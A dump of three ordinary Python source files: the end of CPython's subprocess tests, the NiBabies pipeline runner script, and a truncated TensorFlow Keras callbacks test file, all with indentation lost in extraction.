p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
sys.exit(42)
"""],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
with p:
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
# The process should end after this
time.sleep(1)
# This shouldn't raise even though the child is now dead
getattr(p, method)(*args)
_, stderr = p.communicate()
self.assertEqual(stderr, b'')
rc = p.wait()
self.assertEqual(rc, 42)
def test_send_signal(self):
self._kill_process('send_signal', signal.SIGTERM)
def test_kill(self):
self._kill_process('kill')
def test_terminate(self):
self._kill_process('terminate')
def test_send_signal_dead(self):
self._kill_dead_process('send_signal', signal.SIGTERM)
def test_kill_dead(self):
self._kill_dead_process('kill')
def test_terminate_dead(self):
self._kill_dead_process('terminate')
class MiscTests(unittest.TestCase):
class RecordingPopen(subprocess.Popen):
"""A Popen that saves a reference to each instance for testing."""
instances_created = []
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.instances_created.append(self)
@mock.patch.object(subprocess.Popen, "_communicate")
def _test_keyboardinterrupt_no_kill(self, popener, mock__communicate,
**kwargs):
"""Fake a SIGINT happening during Popen._communicate() and ._wait().
This avoids the need to actually try and get test environments to send
and receive signals reliably across platforms. The net effect of a ^C
happening during a blocking subprocess execution which we want to clean
up from is a KeyboardInterrupt coming out of communicate() or wait().
"""
mock__communicate.side_effect = KeyboardInterrupt
try:
with mock.patch.object(subprocess.Popen, "_wait") as mock__wait:
# We patch out _wait() as no signal was involved so the
# child process isn't actually going to exit rapidly.
mock__wait.side_effect = KeyboardInterrupt
with mock.patch.object(subprocess, "Popen",
self.RecordingPopen):
with self.assertRaises(KeyboardInterrupt):
popener([sys.executable, "-c",
"import time\ntime.sleep(9)\nimport sys\n"
"sys.stderr.write('\\n!runaway child!\\n')"],
stdout=subprocess.DEVNULL, **kwargs)
for call in mock__wait.call_args_list[1:]:
self.assertNotEqual(
call, mock.call(timeout=None),
"no open-ended wait() after the first allowed: "
f"{mock__wait.call_args_list}")
sigint_calls = []
for call in mock__wait.call_args_list:
if call == mock.call(timeout=0.25): # from Popen.__init__
sigint_calls.append(call)
self.assertLessEqual(mock__wait.call_count, 2,
msg=mock__wait.call_args_list)
self.assertEqual(len(sigint_calls), 1,
msg=mock__wait.call_args_list)
finally:
# cleanup the forgotten (due to our mocks) child process
process = self.RecordingPopen.instances_created.pop()
process.kill()
process.wait()
self.assertEqual([], self.RecordingPopen.instances_created)
def test_call_keyboardinterrupt_no_kill(self):
self._test_keyboardinterrupt_no_kill(subprocess.call, timeout=6.282)
def test_run_keyboardinterrupt_no_kill(self):
self._test_keyboardinterrupt_no_kill(subprocess.run, timeout=6.282)
def test_context_manager_keyboardinterrupt_no_kill(self):
def popen_via_context_manager(*args, **kwargs):
with subprocess.Popen(*args, **kwargs) as unused_process:
raise KeyboardInterrupt # Test how __exit__ handles ^C.
self._test_keyboardinterrupt_no_kill(popen_via_context_manager)
def test_getoutput(self):
self.assertEqual(subprocess.getoutput('echo xyzzy'), 'xyzzy')
self.assertEqual(subprocess.getstatusoutput('echo xyzzy'),
(0, 'xyzzy'))
# we use mkdtemp in the next line to create an empty directory
# under our exclusive control; from that, we can invent a pathname
# that we _know_ won't exist. This is guaranteed to fail.
dir = None
try:
dir = tempfile.mkdtemp()
name = os.path.join(dir, "foo")
status, output = subprocess.getstatusoutput(
("type " if mswindows else "cat ") + name)
self.assertNotEqual(status, 0)
finally:
if dir is not None:
os.rmdir(dir)
def test__all__(self):
"""Ensure that __all__ is populated properly."""
intentionally_excluded = {"list2cmdline", "Handle", "pwd", "grp"}
exported = set(subprocess.__all__)
possible_exports = set()
import types
for name, value in subprocess.__dict__.items():
if name.startswith('_'):
continue
if isinstance(value, (types.ModuleType,)):
continue
possible_exports.add(name)
self.assertEqual(exported, possible_exports - intentionally_excluded)
@unittest.skipUnless(hasattr(selectors, 'PollSelector'),
"Test needs selectors.PollSelector")
class ProcessTestCaseNoPoll(ProcessTestCase):
def setUp(self):
self.orig_selector = subprocess._PopenSelector
subprocess._PopenSelector = selectors.SelectSelector
ProcessTestCase.setUp(self)
def tearDown(self):
subprocess._PopenSelector = self.orig_selector
ProcessTestCase.tearDown(self)
@unittest.skipUnless(mswindows, "Windows-specific tests")
class CommandsWithSpaces (BaseTestCase):
def setUp(self):
super().setUp()
f, fname = tempfile.mkstemp(".py", "te st")
self.fname = fname.lower ()
os.write(f, b"import sys;"
b"sys.stdout.write('%d %s' % (len(sys.argv), [a.lower () for a in sys.argv]))"
)
os.close(f)
def tearDown(self):
os.remove(self.fname)
super().tearDown()
def with_spaces(self, *args, **kwargs):
kwargs['stdout'] = subprocess.PIPE
p = subprocess.Popen(*args, **kwargs)
with p:
self.assertEqual(
p.stdout.read ().decode("mbcs"),
"2 [%r, 'ab cd']" % self.fname
)
def test_shell_string_with_spaces(self):
# call() function with string argument with spaces on Windows
self.with_spaces('"%s" "%s" "%s"' % (sys.executable, self.fname,
"ab cd"), shell=1)
def test_shell_sequence_with_spaces(self):
# call() function with sequence argument with spaces on Windows
self.with_spaces([sys.executable, self.fname, "ab cd"], shell=1)
def test_noshell_string_with_spaces(self):
# call() function with string argument with spaces on Windows
self.with_spaces('"%s" "%s" "%s"' % (sys.executable, self.fname,
"ab cd"))
def test_noshell_sequence_with_spaces(self):
# call() function with sequence argument with spaces on Windows
self.with_spaces([sys.executable, self.fname, "ab cd"])
class ContextManagerTests(BaseTestCase):
def test_pipe(self):
with subprocess.Popen([sys.executable, "-c",
"import sys;"
"sys.stdout.write('stdout');"
"sys.stderr.write('stderr');"],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as proc:
self.assertEqual(proc.stdout.read(), b"stdout")
self.assertEqual(proc.stderr.read(), b"stderr")
self.assertTrue(proc.stdout.closed)
self.assertTrue(proc.stderr.closed)
def test_returncode(self):
with subprocess.Popen([sys.executable, "-c",
"import sys; sys.exit(100)"]) as proc:
pass
# __exit__ calls wait(), so the returncode should be set
self.assertEqual(proc.returncode, 100)
def test_communicate_stdin(self):
with subprocess.Popen([sys.executable, "-c",
"import sys;"
"sys.exit(sys.stdin.read() == 'context')"],
stdin=subprocess.PIPE) as proc:
proc.communicate(b"context")
self.assertEqual(proc.returncode, 1)
def test_invalid_args(self):
with self.assertRaises(NONEXISTING_ERRORS):
with subprocess.Popen(NONEXISTING_CMD,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as proc:
pass
def test_broken_pipe_cleanup(self):
"""Broken pipe error should not prevent wait() (Issue 21619)"""
proc = subprocess.Popen(ZERO_RETURN_CMD,
stdin=subprocess.PIPE,
bufsize=support.PIPE_MAX_SIZE*2)
proc = proc.__enter__()
# Prepare to send enough data to overflow any OS pipe buffering and
# guarantee a broken pipe error. Data is held in BufferedWriter
# buffer until closed.
proc.stdin.write(b'x' * support.PIPE_MAX_SIZE)
self.assertIsNone(proc.returncode)
# EPIPE expected under POSIX; EINVAL under Windows
self.assertRaises(OSError, proc.__exit__, None, None, None)
self.assertEqual(proc.returncode, 0)
self.assertTrue(proc.stdin.closed)
if __name__ == "__main__":
unittest.main()
|
run.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""NiBabies runner."""
from .. import config
def main():
"""Entry point."""
from os import EX_SOFTWARE
from pathlib import Path
import sys
import gc
from multiprocessing import Process, Manager
from .parser import parse_args
from ..utils.bids import write_derivative_description, write_bidsignore
parse_args()
# sentry_sdk = None
# if not config.execution.notrack:
# import sentry_sdk
# from ..utils.sentry import sentry_setup
# sentry_setup()
# CRITICAL Save the config to a file. This is necessary because the execution graph
# is built as a separate process to keep the memory footprint low. The most
# straightforward way to communicate with the child process is via the filesystem.
config_file = config.execution.work_dir / config.execution.run_uuid / "config.toml"
config_file.parent.mkdir(exist_ok=True, parents=True)
config.to_filename(config_file)
# CRITICAL Call build_workflow(config_file, retval) in a subprocess.
# Because Python on Linux does not ever free virtual memory (VM), running the
# workflow construction jailed within a process preempts excessive VM buildup.
with Manager() as mgr:
from .workflow import build_workflow
retval = mgr.dict()
p = Process(target=build_workflow, args=(str(config_file), retval))
p.start()
p.join()
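# Prefer the child's exit code; fall back to any return_code it stored in
# the managed dict.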
retcode = p.exitcode or retval.get("return_code", 0)
nibabies_wf = retval.get("workflow", None)
# CRITICAL Load the config from the file. This is necessary because the ``build_workflow``
# function executed constrained in a process may change the config (and thus the global
# state of NiBabies).
config.load(config_file)
if config.execution.reports_only:
sys.exit(int(retcode > 0))
if nibabies_wf and config.execution.write_graph:
nibabies_wf.write_graph(graph2use="colored", format="svg", simple_form=True)
retcode = retcode or (nibabies_wf is None) * EX_SOFTWARE
if retcode != 0:
sys.exit(retcode)
# Generate boilerplate
with Manager() as mgr:
from .workflow import build_boilerplate
p = Process(target=build_boilerplate, args=(str(config_file), nibabies_wf))
p.start()
p.join()
if config.execution.boilerplate_only:
sys.exit(int(retcode > 0))
# Clean up master process before running workflow, which may create forks
gc.collect()
# Sentry tracking
# if sentry_sdk is not None:
# with sentry_sdk.configure_scope() as scope:
# scope.set_tag("run_uuid", config.execution.run_uuid)
# scope.set_tag("npart", len(config.execution.participant_label))
# sentry_sdk.add_breadcrumb(message="nibabies started", level="info")
# sentry_sdk.capture_message("nibabies started", level="info")
config.loggers.workflow.log(
15,
"\n".join(["nibabies config:"] + ["\t\t%s" % s for s in config.dumps().splitlines()]),
)
config.loggers.workflow.log(25, "nibabies started!")
# errno = 1 # Default is error exit unless otherwise set
try:
nibabies_wf.run(**config.nipype.get_plugin())
except Exception as e:
# if not config.execution.notrack:
# from ..utils.sentry import process_crashfile
# crashfolders = [
# config.execution.nibabies_dir,
# / "sub-{}".format(s)
# / "log"
# / config.execution.run_uuid
# for s in config.execution.participant_label
# ]
# for crashfolder in crashfolders:
# for crashfile in crashfolder.glob("crash*.*"):
# process_crashfile(crashfile)
# if "Workflow did not execute cleanly" not in str(e):
# sentry_sdk.capture_exception(e)
config.loggers.workflow.critical("nibabies failed: %s", e)
raise
else:
config.loggers.workflow.log(25, "nibabies finished successfully!")
# if not config.execution.notrack:
# success_message = "nibabies finished without errors"
# sentry_sdk.add_breadcrumb(message=success_message, level="info")
# sentry_sdk.capture_message(success_message, level="info")
# Bother users with the boilerplate only iff the workflow went okay.
boiler_file = config.execution.nibabies_dir / "logs" / "CITATION.md"
if boiler_file.exists():
if config.environment.exec_env in (
"singularity",
"docker",
"nibabies-docker",
):
boiler_file = Path("<OUTPUT_PATH>") / boiler_file.relative_to(
config.execution.output_dir
)
config.loggers.workflow.log(
25,
"Works derived from this nibabies execution should include the "
f"boilerplate text found in {boiler_file}.",
)
if config.workflow.run_reconall:
from templateflow import api
from niworkflows.utils.misc import _copy_any
dseg_tsv = str(api.get("fsaverage", suffix="dseg", extension=[".tsv"]))
_copy_any(dseg_tsv, str(config.execution.nibabies_dir / "desc-aseg_dseg.tsv"))
_copy_any(dseg_tsv, str(config.execution.nibabies_dir / "desc-aparcaseg_dseg.tsv"))
# errno = 0
finally:
from ..reports.core import generate_reports
from pkg_resources import resource_filename as pkgrf
# Generate reports phase
generate_reports(
config.execution.participant_label,
config.execution.nibabies_dir,
config.execution.run_uuid,
config=pkgrf("nibabies", "data/reports-spec.yml"),
packagename="nibabies",
)
write_derivative_description(config.execution.bids_dir, config.execution.nibabies_dir)
write_bidsignore(config.execution.nibabies_dir)
# if failed_reports and not config.execution.notrack:
# sentry_sdk.capture_message(
# "Report generation failed for %d subjects" % failed_reports,
# level="error",
# )
# sys.exit(int((errno + failed_reports) > 0))
if __name__ == "__main__":
raise RuntimeError(
"Please `pip install` this and run via the commandline interfaces, `nibabies <command>`"
)
|
callbacks_test.py
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for Keras callbacks."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import csv
import os
import re
import shutil
import tempfile
import threading
import unittest
from absl.testing import parameterized
import numpy as np
from tensorflow.core.framework import summary_pb2
from tensorflow.python import keras
from tensorflow.python.framework import random_seed
from tensorflow.python.framework import test_util
from tensorflow.python.keras import keras_parameterized
from tensorflow.python.keras import testing_utils
from tensorflow.python.platform import test
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training import adam
try:
import h5py # pylint:disable=g-import-not-at-top
except ImportError:
h5py = None
try:
import requests # pylint:disable=g-import-not-at-top
except ImportError:
requests = None
TRAIN_SAMPLES = 10
TEST_SAMPLES = 10
NUM_CLASSES = 2
INPUT_DIM = 3
NUM_HIDDEN = 5
BATCH_SIZE = 5
class Counter(keras.callbacks.Callback):
"""Counts the number of times each callback method was run.
Attributes:
    method_counts: dict. Contains the counts of times each callback method was
run.
"""
def __init__(self):
self.method_counts = collections.defaultdict(int)
methods_to_count = [
'on_batch_begin', 'on_batch_end', 'on_epoch_begin', 'on_epoch_end',
'on_predict_batch_begin', 'on_predict_batch_end', 'on_predict_begin',
'on_predict_end', 'on_test_batch_begin', 'on_test_batch_end',
'on_test_begin', 'on_test_end', 'on_train_batch_begin',
'on_train_batch_end', 'on_train_begin', 'on_train_end'
]
for method_name in methods_to_count:
setattr(self, method_name,
self.wrap_with_counts(method_name, getattr(self, method_name)))
def wrap_with_counts(self, method_name, method):
def _call_and_count(*args, **kwargs):
self.method_counts[method_name] += 1
return method(*args, **kwargs)
return _call_and_count
def _get_numpy():
return np.ones((10, 10)), np.ones((10, 1))
def _get_sequence():
class MySequence(keras.utils.data_utils.Sequence):
def __getitem__(self, _):
return np.ones((2, 10)), np.ones((2, 1))
def __len__(self):
return 5
return MySequence(), None
@keras_parameterized.run_with_all_model_types
@keras_parameterized.run_all_keras_modes
class CallbackCountsTest(keras_parameterized.TestCase):
def _check_counts(self, counter, expected_counts):
"""Checks that the counts registered by `counter` are those expected."""
for method_name, expected_count in expected_counts.items():
self.assertEqual(
counter.method_counts[method_name],
expected_count,
msg='For method {}: expected {}, got: {}'.format(
method_name, expected_count, counter.method_counts[method_name]))
def _get_model(self):
layers = [
keras.layers.Dense(10, activation='relu'),
keras.layers.Dense(1, activation='sigmoid')
]
model = testing_utils.get_model_from_layers(layers, input_shape=(10,))
model.compile(
adam.AdamOptimizer(0.001),
'binary_crossentropy',
run_eagerly=testing_utils.should_run_eagerly())
return model
@parameterized.named_parameters(('with_numpy', _get_numpy()),
('with_sequence', _get_sequence()))
def test_callback_hooks_are_called_in_fit(self, data):
x, y = data
val_x, val_y = np.ones((4, 10)), np.ones((4, 1))
model = self._get_model()
counter = Counter()
model.fit(
x,
y,
validation_data=(val_x, val_y),
batch_size=2,
epochs=5,
callbacks=[counter])
self._check_counts(
counter, {
'on_batch_begin': 25,
'on_batch_end': 25,
'on_epoch_begin': 5,
'on_epoch_end': 5,
'on_predict_batch_begin': 0,
'on_predict_batch_end': 0,
'on_predict_begin': 0,
'on_predict_end': 0,
'on_test_batch_begin': 10,
'on_test_batch_end': 10,
'on_test_begin': 5,
'on_test_end': 5,
'on_train_batch_begin': 25,
'on_train_batch_end': 25,
'on_train_begin': 1,
'on_train_end': 1
})
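  # Where the expected counts above come from (descriptive note): with
  # batch_size=2 and epochs=5, both fixtures yield 5 training batches per
  # epoch (10 numpy samples / 2, or a 5-item Sequence), hence 25
  # on_(train_)batch_* calls; the 4 validation samples give 2 test batches per
  # epoch, i.e. 10 on_test_batch_* calls and one on_test_begin/end per epoch.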
@parameterized.named_parameters(('with_numpy', _get_numpy()),
('with_sequence', _get_sequence()))
def test_callback_hooks_are_called_in_evaluate(self, data):
x, y = data
model = self._get_model()
counter = Counter()
model.evaluate(x, y, batch_size=2, callbacks=[counter])
self._check_counts(
counter, {
'on_test_batch_begin': 5,
'on_test_batch_end': 5,
'on_test_begin': 1,
'on_test_end': 1
})
@parameterized.named_parameters(('with_numpy', _get_numpy()),
('with_sequence', _get_sequence()))
def test_callback_hooks_are_called_in_predict(self, data):
x = data[0]
model = self._get_model()
counter = Counter()
model.predict(x, batch_size=2, callbacks=[counter])
self._check_counts(
counter, {
'on_predict_batch_begin': 5,
'on_predict_batch_end': 5,
'on_predict_begin': 1,
'on_predict_end': 1
})
def test_callback_list_methods(self):
counter = Counter()
callback_list = keras.callbacks.CallbackList([counter])
batch = 0
callback_list.on_test_batch_begin(batch)
callback_list.on_test_batch_end(batch)
callback_list.on_predict_batch_begin(batch)
callback_list.on_predict_batch_end(batch)
self._check_counts(
counter, {
'on_test_batch_begin': 1,
'on_test_batch_end': 1,
'on_predict_batch_begin': 1,
'on_predict_batch_end': 1
})
class KerasCallbacksTest(test.TestCase):
def test_ModelCheckpoint(self):
if h5py is None:
return # Skip test if models cannot be saved.
with self.cached_session():
np.random.seed(1337)
temp_dir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, temp_dir, ignore_errors=True)
filepath = os.path.join(temp_dir, 'checkpoint.h5')
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
# case 1
monitor = 'val_loss'
save_best_only = False
mode = 'auto'
model = keras.models.Sequential()
model.add(
keras.layers.Dense(
NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'))
model.add(keras.layers.Dense(NUM_CLASSES, activation='softmax'))
model.compile(
loss='categorical_crossentropy',
optimizer='rmsprop',
metrics=['accuracy'])
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
os.remove(filepath)
# case 2
mode = 'min'
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
os.remove(filepath)
# case 3
mode = 'max'
monitor = 'val_acc'
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
os.remove(filepath)
# case 4
save_best_only = True
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
os.remove(filepath)
# Case: metric not available.
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor='unknown',
save_best_only=True)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
# File won't be written.
assert not os.path.exists(filepath)
# case 5
save_best_only = False
period = 2
mode = 'auto'
filepath = os.path.join(temp_dir, 'checkpoint.{epoch:02d}.h5')
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode,
period=period)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=4,
verbose=1)
assert os.path.exists(filepath.format(epoch=2))
assert os.path.exists(filepath.format(epoch=4))
os.remove(filepath.format(epoch=2))
os.remove(filepath.format(epoch=4))
assert not os.path.exists(filepath.format(epoch=1))
assert not os.path.exists(filepath.format(epoch=3))
# Invalid use: this will raise a warning but not an Exception.
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode='unknown')
def test_EarlyStopping(self):
with self.cached_session():
np.random.seed(123)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
model = testing_utils.get_small_sequential_mlp(
num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM)
model.compile(
loss='categorical_crossentropy',
optimizer='rmsprop',
metrics=['accuracy'])
cases = [
('max', 'val_acc'),
('min', 'val_loss'),
('auto', 'val_acc'),
('auto', 'loss'),
('unknown', 'unknown')
]
for mode, monitor in cases:
patience = 0
cbks = [
keras.callbacks.EarlyStopping(
patience=patience, monitor=monitor, mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=5,
verbose=0)
def test_EarlyStopping_reuse(self):
with self.cached_session():
np.random.seed(1337)
patience = 3
data = np.random.random((100, 1))
labels = np.where(data > 0.5, 1, 0)
model = keras.models.Sequential((keras.layers.Dense(
1, input_dim=1, activation='relu'), keras.layers.Dense(
1, activation='sigmoid'),))
model.compile(
optimizer='sgd', loss='binary_crossentropy', metrics=['accuracy'])
weights = model.get_weights()
stopper = keras.callbacks.EarlyStopping(monitor='acc', patience=patience)
hist = model.fit(data, labels, callbacks=[stopper], verbose=0, epochs=20)
assert len(hist.epoch) >= patience
# This should allow training to go for at least `patience` epochs
model.set_weights(weights)
hist = model.fit(data, labels, callbacks=[stopper], verbose=0, epochs=20)
assert len(hist.epoch) >= patience
def test_EarlyStopping_with_baseline(self):
with self.cached_session():
np.random.seed(1337)
baseline = 0.5
(data, labels), _ = testing_utils.get_test_data(
train_samples=100,
test_samples=50,
input_shape=(1,),
num_classes=NUM_CLASSES)
model = testing_utils.get_small_sequential_mlp(
num_hidden=1, num_classes=1, input_dim=1)
model.compile(
optimizer='sgd', loss='binary_crossentropy', metrics=['accuracy'])
stopper = keras.callbacks.EarlyStopping(monitor='acc',
baseline=baseline)
hist = model.fit(data, labels, callbacks=[stopper], verbose=0, epochs=20)
assert len(hist.epoch) == 1
patience = 3
stopper = keras.callbacks.EarlyStopping(monitor='acc',
patience=patience,
baseline=baseline)
hist = model.fit(data, labels, callbacks=[stopper], verbose=0, epochs=20)
assert len(hist.epoch) >= patience
def test_EarlyStopping_final_weights_when_restoring_model_weights(self):
class DummyModel(object):
def __init__(self):
self.stop_training = False
self.weights = -1
def get_weights(self):
return self.weights
def set_weights(self, weights):
self.weights = weights
def set_weight_to_epoch(self, epoch):
self.weights = epoch
early_stop = keras.callbacks.EarlyStopping(monitor='val_loss',
patience=2,
restore_best_weights=True)
early_stop.model = DummyModel()
losses = [0.2, 0.15, 0.1, 0.11, 0.12]
    # The best configuration is in epoch 2 (loss = 0.1000).
epochs_trained = 0
early_stop.on_train_begin()
for epoch in range(len(losses)):
epochs_trained += 1
early_stop.model.set_weight_to_epoch(epoch=epoch)
early_stop.on_epoch_end(epoch, logs={'val_loss': losses[epoch]})
if early_stop.model.stop_training:
break
# The best configuration is in epoch 2 (loss = 0.1000),
# and while patience = 2, we're restoring the best weights,
# so we end up at the epoch with the best weights, i.e. epoch 2
self.assertEqual(early_stop.model.get_weights(), 2)
def test_RemoteMonitor(self):
if requests is None:
return
monitor = keras.callbacks.RemoteMonitor()
    # This will raise a warning since the default address is unreachable:
monitor.on_epoch_end(0, logs={'loss': 0.})
def test_LearningRateScheduler(self):
with self.cached_session():
np.random.seed(1337)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
model = testing_utils.get_small_sequential_mlp(
num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM)
model.compile(
loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
cbks = [keras.callbacks.LearningRateScheduler(lambda x: 1. / (1. + x))]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=5,
verbose=0)
assert (
float(keras.backend.get_value(
model.optimizer.lr)) - 0.2) < keras.backend.epsilon()
cbks = [keras.callbacks.LearningRateScheduler(lambda x, lr: lr / 2)]
model.compile(
loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=2,
verbose=0)
assert (
float(keras.backend.get_value(
model.optimizer.lr)) - 0.01 / 4) < keras.backend.epsilon()
def test_ReduceLROnPlateau(self):
with self.cached_session():
np.random.seed(1337)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
def make_model():
random_seed.set_random_seed(1234)
np.random.seed(1337)
model = testing_utils.get_small_sequential_mlp(
num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM)
model.compile(
loss='categorical_crossentropy',
optimizer=keras.optimizers.SGD(lr=0.1))
return model
model = make_model()
      # This should reduce the LR after the first epoch (due to high min_delta).
cbks = [
keras.callbacks.ReduceLROnPlateau(
monitor='val_loss',
factor=0.1,
min_delta=10,
patience=1,
cooldown=5)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=5,
verbose=0)
self.assertAllClose(
float(keras.backend.get_value(model.optimizer.lr)),
0.01,
atol=1e-4)
model = make_model()
cbks = [
keras.callbacks.ReduceLROnPlateau(
monitor='val_loss',
factor=0.1,
min_delta=0,
patience=1,
cooldown=5)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=5,
verbose=2)
self.assertAllClose(
float(keras.backend.get_value(model.optimizer.lr)), 0.1, atol=1e-4)
def test_ReduceLROnPlateau_patience(self):
class DummyOptimizer(object):
def __init__(self):
self.lr = keras.backend.variable(1.0)
class DummyModel(object):
def __init__(self):
self.optimizer = DummyOptimizer()
reduce_on_plateau = keras.callbacks.ReduceLROnPlateau(
monitor='val_loss', patience=2)
reduce_on_plateau.model = DummyModel()
losses = [0.0860, 0.1096, 0.1040]
lrs = []
for epoch in range(len(losses)):
reduce_on_plateau.on_epoch_end(epoch, logs={'val_loss': losses[epoch]})
lrs.append(keras.backend.get_value(reduce_on_plateau.model.optimizer.lr))
# The learning rates should be 1.0 except the last one
for lr in lrs[:-1]:
self.assertEqual(lr, 1.0)
self.assertLess(lrs[-1], 1.0)
def test_ReduceLROnPlateau_backwards_compatibility(self):
with test.mock.patch.object(logging, 'warning') as mock_log:
reduce_on_plateau = keras.callbacks.ReduceLROnPlateau(epsilon=1e-13)
self.assertRegexpMatches(
str(mock_log.call_args), '`epsilon` argument is deprecated')
self.assertFalse(hasattr(reduce_on_plateau, 'epsilon'))
self.assertTrue(hasattr(reduce_on_plateau, 'min_delta'))
self.assertEqual(reduce_on_plateau.min_delta, 1e-13)
def test_CSVLogger(self):
with self.cached_session():
np.random.seed(1337)
temp_dir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, temp_dir, ignore_errors=True)
filepath = os.path.join(temp_dir, 'log.tsv')
sep = '\t'
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
def make_model():
np.random.seed(1337)
model = testing_utils.get_small_sequential_mlp(
num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM)
model.compile(
loss='categorical_crossentropy',
optimizer=keras.optimizers.SGD(lr=0.1),
metrics=['accuracy'])
return model
# case 1, create new file with defined separator
model = make_model()
cbks = [keras.callbacks.CSVLogger(filepath, separator=sep)]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
with open(filepath) as csvfile:
dialect = csv.Sniffer().sniff(csvfile.read())
assert dialect.delimiter == sep
del model
del cbks
# case 2, append data to existing file, skip header
model = make_model()
cbks = [keras.callbacks.CSVLogger(filepath, separator=sep, append=True)]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
# case 3, reuse of CSVLogger object
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=2,
verbose=0)
with open(filepath) as csvfile:
list_lines = csvfile.readlines()
for line in list_lines:
assert line.count(sep) == 4
assert len(list_lines) == 5
output = ' '.join(list_lines)
assert len(re.findall('epoch', output)) == 1
os.remove(filepath)
def test_stop_training_csv(self):
